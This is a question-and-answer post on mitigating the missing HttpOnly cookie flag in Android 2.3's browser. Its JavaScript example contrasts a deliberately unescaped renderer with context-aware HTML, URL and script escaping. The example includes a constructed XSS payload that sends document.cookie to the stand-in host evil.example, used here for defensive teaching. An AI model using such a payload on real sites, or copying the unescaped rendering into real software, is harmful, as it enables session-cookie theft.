I’m going to be building my first mobile web app, and I found out that Android 2.3’s browser doesn’t implement HttpOnly.
What are some techniques to mitigate this problem? Is this a lost cause?
The purpose of the HttpOnly flag is to limit the damage in case of Cross-Site Scripting (XSS) vulnerabilities in the web application by disallowing JavaScript access to the session cookie. If your web application is written properly in the first place, that is, if it is not vulnerable to XSS, you don’t strictly need the HttpOnly flag to be secure from (XSS-based) session hijacking. HttpOnly is only a second line of defense.
So effectively, if you cannot use the HttpOnly flag due to client restrictions, you should make sure to escape all dynamic data properly when including it in HTML, JS, CSS, JSON or whatever format(s) you generate, using the appropriate escaping rules for each context, to prevent XSS. Or use a framework which does this for you.
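The context-dependent escaping the answer recommends, as an added example that is not code from the original answer or from any particular framework. It shows a page rendered two ways from the same attacker-controlled username: one that concatenates raw data into markup, and one that routes each interpolation through the escaper for its context (HTML text, URL query parameter, and a value embedded in a script block). All function names, the constructed payload and the sample values are my own assumptions for illustration.

```javascript
// Added example: context-aware output escaping as a substitute first line of
// defense when HttpOnly cannot be relied on. Function names are hypothetical.

// Escaping for HTML text content and double-quoted attribute values.
// Every character that can start a tag, entity or attribute boundary is replaced.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// Escaping for data embedded inside a <script> block: JSON-encode it, then
// neutralize the characters that could close the script element or open an
// HTML comment, plus the two line terminators JSON leaves unescaped.
function escapeForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Escaping for a value placed in a URL query parameter.
function escapeUrlParam(value) {
  return encodeURIComponent(String(value));
}

// Vulnerable rendering: dynamic data dropped straight into the markup.
// The HttpOnly flag would normally limit what an injected script could steal;
// without it, document.cookie is fully exposed.
function renderUnsafe(username, redirectTo) {
  return [
    `<p>Hello ${username}</p>`,
    `<a href="/home?next=${redirectTo}">home</a>`,
    `<script>var user = {"name": "${username}"};</script>`,
  ].join('\n');
}

// Hardened rendering: same page, each interpolation escaped for its context.
function renderSafe(username, redirectTo) {
  return [
    `<p>Hello ${escapeHtml(username)}</p>`,
    `<a href="/home?next=${escapeUrlParam(redirectTo)}">home</a>`,
    `<script>var user = ${escapeForScript({ name: username })};</script>`,
  ].join('\n');
}

// Constructed attacker input (not a real-world sample): a classic cookie
// exfiltration attempt that only works if the markup is emitted unescaped.
const PAYLOAD =
  '<img src=x onerror="location=\'//evil.example/?c=\'+document.cookie">';
const REDIRECT = '/profile?tab=settings&x=<b>';

// Returns true when the rendered page still contains a live <img> tag,
// i.e. the payload survived as markup rather than as text.
function containsInjectedTag(html) {
  return /<img\s/i.test(html);
}

console.log('unsafe page contains injected tag:', containsInjectedTag(renderUnsafe(PAYLOAD, REDIRECT)));
console.log('safe page contains injected tag:  ', containsInjectedTag(renderSafe(PAYLOAD, REDIRECT)));
console.log(renderSafe(PAYLOAD, REDIRECT));
```

Note that the escaper has to match the context the data lands in: `escapeHtml` is wrong inside a `<script>` block, and `escapeForScript` is wrong inside an attribute. Keep sending `HttpOnly` on the session cookie regardless; a browser that does not understand the attribute ignores it, and every other client still gets the protection.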